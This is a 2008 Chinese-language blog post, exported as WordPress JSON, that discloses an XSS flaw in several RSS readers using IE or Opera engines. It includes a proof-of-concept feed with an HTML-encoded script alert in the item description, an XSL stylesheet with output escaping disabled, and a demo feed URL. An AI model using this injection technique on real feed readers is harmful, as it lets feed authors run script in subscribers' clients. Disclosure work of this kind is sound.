{"id":132,"date":"2008-09-27T15:48:09","date_gmt":"2008-09-27T15:48:09","guid":{"rendered":""},"modified":"2011-04-25T08:39:29","modified_gmt":"2011-04-25T08:39:29","slug":"%e5%85%ac%e5%b8%83%e6%bc%8f%e6%b4%9e%ef%bc%9a%e5%a4%9a%e6%ac%berss%e9%98%85%e8%af%bb%e5%99%a8%e5%87%ba%e7%8e%b0xss%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/132.html","title":{"rendered":"\u516c\u5e03\u6f0f\u6d1e\uff1a\u591a\u6b3eRSS\u9605\u8bfb\u5668\u51fa\u73b0XSS\u6f0f\u6d1e"},"content":{"rendered":"

\u53d7\u5f71\u54cd\u7cfb\u7edf\uff1a<\/strong><\/p>\n

\n

\u8c03\u7528\u4ee5\u4e0b\u5185\u6838\u89e3\u6790RSS\u7684RSS\u9605\u8bfb\u5668\uff1a<\/p>\n

INTERNET EXPLORER ver<= IE7 \uff08\u5176\u4ed6\u7248\u672c\u672a\u7ecf\u6d4b\u8bd5\uff0c\u4f30\u8ba1\u4e5f\u6709\uff09<\/p>\n

OPERA ver <=9.52<\/p>\n<\/blockquote>\n

\u4ee5\u4e0b\u9605\u8bfb\u5668\u51fa\u73b0\u6f0f\u6d1e\uff1a<\/strong><\/p>\n

\n

\u65b0\u6d6a\u70b9\u70b9\u901a1.1.0.8 \u76ee\u524d\u6700\u9ad8<\/p>\n

\u5468\u535a\u901a4.0(28031409) \u76ee\u524d\u6700\u9ad8<\/p>\n

\u9068\u6e382.1.4.443\uff08\u76ee\u524d\u6700\u9ad8\uff09 RSS\u4fa7\u8fb9\u680f<\/p>\n

\u3002\u3002\u3002\u4e0d\u518d\u4e00\u4e00\u5217\u4e3e\u3002<\/p>\n<\/blockquote>\n

\u4e0d\u53d7\u5f71\u54cd\u7cfb\u7edf\uff1a<\/strong><\/p>\n

\n

GOOGLE\u7684RSS reader\uff0c\u56e0\u4e3a\u8fd9\u4e2aRSS\u9605\u8bfb\u5668\u6ca1\u6709\u8c03\u7528IE\u7684\u5185\u6838\u53bb\u89e3\u6790<description>\uff0c\u800c\u662f\u81ea\u5df1\u89e3\u6790\u540e\u8f93\u51fa\u4e3ahtml\u3002<\/p>\n<\/blockquote>\n

\u63cf\u8ff0\uff1a<\/strong><\/p>\n

\n

IE\u548cOPERA\u5bf9RSS\u4e2d<item>\u4e0b\u7684<description>\u6807\u7b7e\u5185\u5bb9\uff0c\u89e3\u6790\u8fc7\u7a0b\u5982\u4e0b\uff1a<\/p>\n

\u9996\u5148\u4f7f\u7528HTML\u7f16\u7801\u5bf9\u5185\u5bb9\u89e3\u5bc6\uff08\u4f8b\uff1a‘&lt;’\u89e3\u6790\u4e3a‘<’\uff09\uff0c\u4e4b\u540e\u6267\u884c\u5176\u4e2dHTML\u4ee3\u7801\u3002<\/p>\n

\u8fd9\u79cd\u89e3\u6790\u65b9\u5f0f\u5bfc\u81f4\u4e00\u4e9bRSS\u9605\u8bfb\u5de5\u5177\u5bf9\u6b64\u8fc7\u6ee4\u4e0d\u4e25\uff0c\u51fa\u73b0XSS\u6f0f\u6d1e\u3002<\/p>\n

<*\u6765\u6e90\uff1akxlzx \uff08<\/strong>kxlzx@xiaotou.org<\/strong><\/a>\uff09  <\/strong>http:\/\/inbreak.net\/<\/strong><\/a>   *><\/strong><\/p>\n

\u6d4b\u8bd5\u65b9\u6cd5\uff1a<\/strong><\/p>\n

\n

 <\/p>\n

 <\/p>\n

\u5728<description>\u6807\u7b7e\u7684\u5185\u5bb9\u4e2d\u8f93\u5165HTML\u7f16\u7801\u540e\u7684JS\u4ee3\u7801\uff0c\u4f8b\u5982\uff1a<\/p>\n

 <\/p>\n

\n
rss.xml\u4ee3\u7801<\/div>\n
    \n
  1. <?<\/span>xml<\/span> <\/span>version<\/span>=<\/span>"1.0"<\/span> <\/span>encoding<\/span>=<\/span>"utf-8"<\/span>?><\/span><?<\/span>xml-stylesheet<\/span> <\/span>href<\/span>=<\/span>‘kxlzx.xsl’<\/span> <\/span>type<\/span>=<\/span>‘text\/xsl’<\/span> <\/span>?><\/span>  <\/span><\/span><\/li>\n
  2. <<\/span>rss<\/span> <\/span>xmlns:atom<\/span>=<\/span>"http:\/\/www.w3.org\/2005\/Atom"<\/span> <\/span>xmlns:dc<\/span>=<\/span>"http:\/\/purl.org\/dc\/elements\/1.1\/"<\/span>  <\/span><\/li>\n
  3.     <\/span>xmlns:fs<\/span>=<\/span>"http:\/\/www.feedsky.com\/namespace\/feed"<\/span> <\/span>xmlns:content<\/span>=<\/span>"http:\/\/purl.org\/rss\/1.0\/modules\/content\/"<\/span>  <\/span><\/li>\n
  4.     <\/span>xmlns:wfw<\/span>=<\/span>"http:\/\/wellformedweb.org\/CommentAPI\/"<\/span> <\/span>xmlns:trackback<\/span>=<\/span>"http:\/\/madskills.com\/public\/xml\/rss\/module\/trackback\/"<\/span>  <\/span><\/li>\n
  5.     <\/span>version<\/span>=<\/span>"2.0"<\/span>><\/span>  <\/span><\/li>\n
  6.     <\/span><<\/span>channel<\/span>><\/span>  <\/span><\/li>\n
  7.         <\/span><<\/span>update<\/span>><\/span>Mon, 26 Oct 2008 10:36:52 +0800<\/span><\/<\/span>update<\/span>><\/span>  <\/span><\/li>\n
  8.         <\/span><<\/span>title<\/span>><\/span>hacked by kxlzx<\/span><\/<\/span>title<\/span>><\/span>  <\/span><\/li>\n
  9.         <\/span><<\/span>description<\/span>><\/span>hacked by kxlzx<\/span><\/<\/span>description<\/span>><\/span>  <\/span><\/li>\n
  10.         <\/span><<\/span>item<\/span>><\/span>  <\/span><\/li>\n
  11.         <\/span><<\/span>title<\/span>><\/span>hacked by kxlzx title<\/span><\/<\/span>title<\/span>><\/span>  <\/span><\/li>\n
  12.         <\/span><<\/span>author<\/span> <\/span>xmlns<\/span>=<\/span>"http:\/\/www.w3.org\/2005\/Atom"<\/span>><\/span>  <\/span><\/li>\n
  13.             <\/span><<\/span>name<\/span>><\/span>test all<\/span><\/<\/span>name<\/span>><\/span>  <\/span><\/li>\n
  14.         <\/span><\/<\/span>author<\/span>><\/span>  <\/span><\/li>\n
  15.         <\/span><<\/span>id<\/span> <\/span>xmlns<\/span>=<\/span>"http:\/\/www.w3.org\/2005\/Atom"<\/span>><\/span>http:\/\/inbreak.net\/<\/span><\/<\/span>id<\/span>><\/span>  <\/span><\/li>\n
  16.         <\/span><<\/span>description<\/span>><\/span>&lt;script&gt;alert(‘xss’);&lt;\/script&gt;<\/font><\/span><\/<\/span>description<\/span>><\/span>  <\/span><\/li>\n
  17.         <\/span><<\/span>pubDate<\/span>><\/span>Mon, 27 Oct 2008 09:34:54 +0800<\/span><\/<\/span>pubDate<\/span>><\/span>  <\/span><\/li>\n
  18.         <\/span><\/<\/span>item<\/span>><\/span>  <\/span><\/li>\n
  19.     <\/span><\/<\/span>channel<\/span>><\/span>  <\/span><\/li>\n
  20. <\/<\/span>rss<\/span>><\/span>  <\/span><\/li>\n<\/ol>\n<\/div>\n

     <\/p>\n

    \n
    kxlzx.xsl\u4ee3\u7801<\/div>\n
      \n
    1. <?<\/span>xml<\/span> <\/span>version<\/span>=<\/span>"1.0"<\/span> <\/span>encoding<\/span>=<\/span>"UTF-8"<\/span>?><\/span>  <\/span><\/span><\/li>\n
    2. <<\/span>xsl:stylesheet<\/span> <\/span>xmlns:xsl<\/span>=<\/span>"http:\/\/www.w3.org\/1999\/XSL\/Transform"<\/span> <\/span>version<\/span>=<\/span>"1.0"<\/span>><\/span>  <\/span><\/li>\n
    3.     <\/span><<\/span>xsl:output<\/span> <\/span>method<\/span>=<\/span>"html"<\/span> <\/span>indent<\/span>=<\/span>"yes"<\/span> <\/span>doctype-system<\/span>=<\/span>"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd"<\/span> <\/span>doctype-public<\/span>=<\/span>"-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN"<\/span>\/><\/span>  <\/span><\/li>\n
    4.     <\/span><<\/span>xsl:variable<\/span> <\/span>name<\/span>=<\/span>"title"<\/span> <\/span>select<\/span>=<\/span>"\/rss\/channel\/title"<\/span>\/><\/span>  <\/span><\/li>\n
    5.     <\/span><<\/span>xsl:variable<\/span> <\/span>name<\/span>=<\/span>"feedUrl"<\/span> <\/span>select<\/span>=<\/span>"\/rss\/channel\/atom:link[@ref=’self’]\/@href"<\/span> <\/span>xmlns:atom<\/span>=<\/span>"http:\/\/www.w3.org\/2005\/Atom"<\/span>\/><\/span>  <\/span><\/li>\n
    6.     <\/span><<\/span>xsl:variable<\/span> <\/span>name<\/span>=<\/span>"srclink"<\/span> <\/span>select<\/span>=<\/span>"\/rss\/channel\/link"<\/span>\/><\/span>  <\/span><\/li>\n
    7.     <\/span><<\/span>xsl:template<\/span> <\/span>match<\/span>=<\/span>"\/"<\/span>><\/span>  <\/span><\/li>\n
    8.         <\/span><<\/span>html<\/span>><\/span>  <\/span><\/li>\n
    9.             <\/span><<\/span>head<\/span>><\/span>  <\/span><\/li>\n
    10.                 <\/span><<\/span>meta<\/span> <\/span>http-equiv<\/span>=<\/span>"Content-Type"<\/span> <\/span>content<\/span>=<\/span>"text\/html; charset=utf-8"<\/span>\/><\/span>  <\/span><\/li>\n
    11.             <\/span><\/<\/span>head<\/span>><\/span>  <\/span><\/li>\n
    12.             <\/span><<\/span>xsl:apply-templates<\/span> <\/span>select<\/span>=<\/span>"rss\/channel"<\/span>\/><\/span>  <\/span><\/li>\n
    13.         <\/span><\/<\/span>html<\/span>><\/span>  <\/span><\/li>\n
    14.     <\/span><\/<\/span>xsl:template<\/span>><\/span>  <\/span><\/li>\n
    15.     <\/span><<\/span>xsl:template<\/span> <\/span>match<\/span>=<\/span>"channel"<\/span>><\/span>  <\/span><\/li>\n
    16.         <\/span><<\/span>body<\/span>><\/span>  <\/span><\/li>\n
    17.                <\/span><\/li>\n
    18. <<\/span>div<\/span> <\/span>id<\/span>=<\/span>"wrapper"<\/span>><\/span>  <\/span><\/li>\n
    19. <<\/span>div<\/span> <\/span>id<\/span>=<\/span>"content"<\/span>><\/span>  <\/span><\/li>\n
    20. <<\/span>xsl:apply-templates<\/span> <\/span>select<\/span>=<\/span>"image"<\/span>\/><\/span>  <\/span><\/li>\n
    21. <<\/span>h1<\/span>><\/span><<\/span>a<\/span> <\/span>href<\/span>=<\/span>"{link}"<\/span> <\/span>style<\/span>=<\/span>"color:#94B3C5;"<\/span>><\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"$title"<\/span>\/><\/span><\/<\/span>a<\/span>><\/span><\/<\/span>h1<\/span>><\/span>  <\/span><\/li>\n
    22.                 <\/span><\/li>\n
    23.     <\/span><<\/span>p<\/span> <\/span>id<\/span>=<\/span>"desc"<\/span>><\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"description"<\/span> <\/span>disable-output-escaping<\/span>=<\/span>"yes"<\/span>\/><\/span><\/<\/span>p<\/span>><\/span>  <\/span><\/li>\n
    24.   <\/span><\/li>\n
    25. <<\/span>ul<\/span> <\/span>id<\/span>=<\/span>"item"<\/span> <\/span>class<\/span>=<\/span>"item"<\/span>><\/span>  <\/span><\/li>\n
    26. <<\/span>xsl:apply-templates<\/span> <\/span>select<\/span>=<\/span>"item"<\/span>\/><\/span>  <\/span><\/li>\n
    27. <\/<\/span>ul<\/span>><\/span>  <\/span><\/li>\n
    28. <\/<\/span>div<\/span>><\/span>             <\/span><\/li>\n
    29. <\/<\/span>div<\/span>><\/span>  <\/span><\/li>\n
    30.   <\/span><\/li>\n
    31. <\/<\/span>body<\/span>><\/span>  <\/span><\/li>\n
    32.     <\/span><\/<\/span>xsl:template<\/span>><\/span>  <\/span><\/li>\n
    33.     <\/span><<\/span>xsl:template<\/span> <\/span>match<\/span>=<\/span>"item"<\/span>><\/span>  <\/span><\/li>\n
    34.                    <\/span><\/li>\n
    35.         <\/span><<\/span>li<\/span>><\/span>  <\/span><\/li>\n
    36. <<\/span>h2<\/span>><\/span><<\/span>a<\/span> <\/span>href<\/span>=<\/span>"{link}"<\/span>><\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"title"<\/span>\/><\/span><\/<\/span>a<\/span>><\/span><\/<\/span>h2<\/span>><\/span>  <\/span><\/li>\n
    37. <<\/span>span<\/span> <\/span>class<\/span>=<\/span>"date"<\/span>><\/span> <\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"pubDate"<\/span>\/><\/span><\/<\/span>span<\/span>><\/span>  <\/span><\/li>\n
    38.                <\/span><\/li>\n
    39.     <\/span><<\/span>p<\/span> <\/span>name<\/span>=<\/span>"decodeable"<\/span> <\/span>class<\/span>=<\/span>"itemcontent"<\/span>><\/span><<\/span>xsl:call-template<\/span> <\/span>name<\/span>=<\/span>"outputContent"<\/span>\/><\/span><\/<\/span>p<\/span>><\/span>  <\/span><\/li>\n
    40.   <\/span><\/li>\n
    41.  <\/span><<\/span>xsl:if<\/span> <\/span>test<\/span>=<\/span>"count(child::enclosure)=1"<\/span>><\/span>  <\/span><\/li>\n
    42.                 <\/span><<\/span>dd<\/span>><\/span>  <\/span><\/li>\n
    43.                     <\/span><<\/span>a<\/span> <\/span>href<\/span>=<\/span>"{enclosure\/@url}"<\/span>><\/span>  <\/span><\/li>\n
    44.                         <\/span><<\/span>img<\/span> <\/span>src<\/span>=<\/span>"http:\/\/www.feedsky.com\/images\/listen.gif"<\/span> <\/span>style<\/span>=<\/span>"vertical-align: middle; padding-left: 4px;"<\/span>\/><\/span>  <\/span><\/li>\n
    45.                     <\/span><\/<\/span>a<\/span>><\/span>  <\/span><\/li>\n
    46.                 <\/span><\/<\/span>dd<\/span>><\/span>  <\/span><\/li>\n
    47.             <\/span><\/<\/span>xsl:if<\/span>><\/span>  <\/span><\/li>\n
    48.   <\/span><\/li>\n
    49. <\/<\/span>li<\/span>><\/span>  <\/span><\/li>\n
    50.            <\/span><\/li>\n
    51.     <\/span><\/<\/span>xsl:template<\/span>><\/span>  <\/span><\/li>\n
    52.     <\/span><<\/span>xsl:template<\/span> <\/span>match<\/span>=<\/span>"image"<\/span>><\/span>  <\/span><\/li>\n
    53.         <\/span><<\/span>xsl:element<\/span> <\/span>name<\/span>=<\/span>"img"<\/span> <\/span>namespace<\/span>=<\/span>"http:\/\/www.w3.org\/1999\/xhtml"<\/span>><\/span>  <\/span><\/li>\n
    54.             <\/span><<\/span>xsl:attribute<\/span> <\/span>name<\/span>=<\/span>"src"<\/span>><\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"url"<\/span>\/><\/span><\/<\/span>xsl:attribute<\/span>><\/span>  <\/span><\/li>\n
    55.             <\/span><<\/span>xsl:attribute<\/span> <\/span>name<\/span>=<\/span>"alt"<\/span>><\/span>  <\/span><\/li>\n
    56.                 Link to <\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"title"<\/span>\/><\/span><\/<\/span>xsl:attribute<\/span>><\/span>  <\/span><\/li>\n
    57.             <\/span><<\/span>xsl:attribute<\/span> <\/span>name<\/span>=<\/span>"id"<\/span>><\/span>feedimage<\/span><\/<\/span>xsl:attribute<\/span>><\/span>  <\/span><\/li>\n
    58.         <\/span><\/<\/span>xsl:element<\/span>><\/span>  <\/span><\/li>\n
    59.         <\/span><<\/span>xsl:text<\/span>><\/span> <\/span><\/<\/span>xsl:text<\/span>><\/span>  <\/span><\/li>\n
    60.     <\/span><\/<\/span>xsl:template<\/span>><\/span>  <\/span><\/li>\n
    61.     <\/span><<\/span>xsl:template<\/span> <\/span>match<\/span>=<\/span>"feedsky:browserFriendly"<\/span> <\/span>xmlns:feedsky<\/span>=<\/span>"http:\/\/namespace.org\/feedsky\/ext\/1.0"<\/span>><\/span>  <\/span><\/li>\n
    62.         <\/span><<\/span>p<\/span> <\/span>id<\/span>=<\/span>"ownerblurb"<\/span> <\/span>xmlns<\/span>=<\/span>"http:\/\/www.w3.org\/1999\/xhtml"<\/span>><\/span>  <\/span><\/li>\n
    63.             <\/span><<\/span>em<\/span>><\/span>A message from the feed publisher:<\/span><\/<\/span>em<\/span>><\/span>  <\/span><\/li>\n
    64.             <\/span><<\/span>xsl:text<\/span>><\/span> <\/span><\/<\/span>xsl:text<\/span>><\/span>  <\/span><\/li>\n
    65.             <\/span><<\/span>xsl:apply-templates<\/span>\/><\/span>  <\/span><\/li>\n
    66.         <\/span><\/<\/span>p<\/span>><\/span>  <\/span><\/li>\n
    67.     <\/span><\/<\/span>xsl:template<\/span>><\/span>  <\/span><\/li>\n
    68.     <\/span><<\/span>xsl:template<\/span> <\/span>name<\/span>=<\/span>"outputContent"<\/span>><\/span>  <\/span><\/li>\n
    69.         <\/span><<\/span>xsl:choose<\/span>><\/span>  <\/span><\/li>\n
    70.             <\/span><<\/span>xsl:when<\/span> <\/span>test<\/span>=<\/span>"xhtml:body"<\/span> <\/span>xmlns:xhtml<\/span>=<\/span>"http:\/\/www.w3.org\/1999\/xhtml"<\/span>><\/span>  <\/span><\/li>\n
    71.                 <\/span><<\/span>xsl:copy-of<\/span> <\/span>select<\/span>=<\/span>"xhtml:body\/*"<\/span>\/><\/span>  <\/span><\/li>\n
    72.             <\/span><\/<\/span>xsl:when<\/span>><\/span>  <\/span><\/li>\n
    73.             <\/span><<\/span>xsl:when<\/span> <\/span>test<\/span>=<\/span>"xhtml:div"<\/span> <\/span>xmlns:xhtml<\/span>=<\/span>"http:\/\/www.w3.org\/1999\/xhtml"<\/span>><\/span>  <\/span><\/li>\n
    74.                 <\/span><<\/span>xsl:copy-of<\/span> <\/span>select<\/span>=<\/span>"xhtml:div"<\/span>\/><\/span>  <\/span><\/li>\n
    75.             <\/span><\/<\/span>xsl:when<\/span>><\/span>  <\/span><\/li>\n
    76.             <\/span><<\/span>xsl:when<\/span> <\/span>test<\/span>=<\/span>"content:encoded"<\/span> <\/span>xmlns:content<\/span>=<\/span>"http:\/\/purl.org\/rss\/1.0\/modules\/content\/"<\/span>><\/span>  <\/span><\/li>\n
    77.                 <\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"content:encoded"<\/span> <\/span>disable-output-escaping<\/span>=<\/span>"yes"<\/span>\/><\/span>  <\/span><\/li>\n
    78.             <\/span><\/<\/span>xsl:when<\/span>><\/span>  <\/span><\/li>\n
    79.             <\/span><<\/span>xsl:when<\/span> <\/span>test<\/span>=<\/span>"description"<\/span>><\/span>  <\/span><\/li>\n
    80.                 <\/span><<\/span>xsl:value-of<\/span> <\/span>select<\/span>=<\/span>"description"<\/span> <\/span>disable-output-escaping<\/span>=<\/span>"yes"<\/span>\/><\/span>  <\/span><\/li>\n
    81.             <\/span><\/<\/span>xsl:when<\/span>><\/span>  <\/span><\/li>\n
    82.         <\/span><\/<\/span>xsl:choose<\/span>><\/span>  <\/span><\/li>\n
    83.     <\/span><\/<\/span>xsl:template<\/span>><\/span>  <\/span><\/li>\n
    84. <\/<\/span>xsl:stylesheet<\/span>><\/span>  <\/span><\/li>\n<\/ol>\n<\/div>\n

      \u6f14\u793a\u5730\u5740\uff1a<\/p>\n

      http:\/\/inbreak.net\/kxlzxtest\/rss8.xml<\/a><\/p>\n

      \u4f7f\u7528RSS\u9605\u8bfb\u5668\u8ba2\u9605\u6b64\u5730\u5740\u3002<\/p>\n

      \u5efa\u8bae\uff1a<\/strong><\/p>\n

      \n

      \u6ca1\u5565\u5efa\u8bae\uff0c\u7948\u7977RSS\u9605\u8bfb\u5668\u5382\u5546\u5347\u7ea7\u597d\u4e86\u3002<\/p>\n

      \u94fe\u63a5\uff1ahttp:\/\/inbreak.net\/?action=show&id=132<\/a><\/p>\n

       <\/p>\n","protected":false},"excerpt":{"rendered":"

      \u6f0f\u6d1e\u63cf\u8ff0\uff1a<\/p>\n

      IE\u548cOPERA\u5bf9RSS\u4e2d<\/p>\n

      <item>\u4e0b\u7684<description>\u6807\u7b7e\u5185\u5bb9\u89e3\u6790\u8fc7\u7a0b\u5982\u4e0b\uff1a<\/p>\n

      \u9996\u5148\u4f7f\u7528HTML\u7f16\u7801\u5bf9\u5185\u5bb9\u89e3\u5bc6\uff08\u4f8b\uff1a‘&lt;’\u89e3\u6790\u4e3a‘<’\uff09\uff0c\u4e4b\u540e\u6267\u884c\u5176\u4e2dHTML\u4ee3\u7801\u3002<\/p>\n

      \u8fd9\u79cd\u89e3\u6790\u65b9\u5f0f\u5bfc\u81f4\u4e00\u4e9bRSS\u9605\u8bfb\u5de5\u5177\u5bf9\u6b64\u8fc7\u6ee4\u4e0d\u4e25\uff0c\u51fa\u73b0XSS\u6f0f\u6d1e\u3002<\/p>\n

      \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[30,24],"views":4522,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/132"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=132"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/132\/revisions"}],"predecessor-version":[{"id":240,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/132\/revisions\/240"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=132"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=132"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}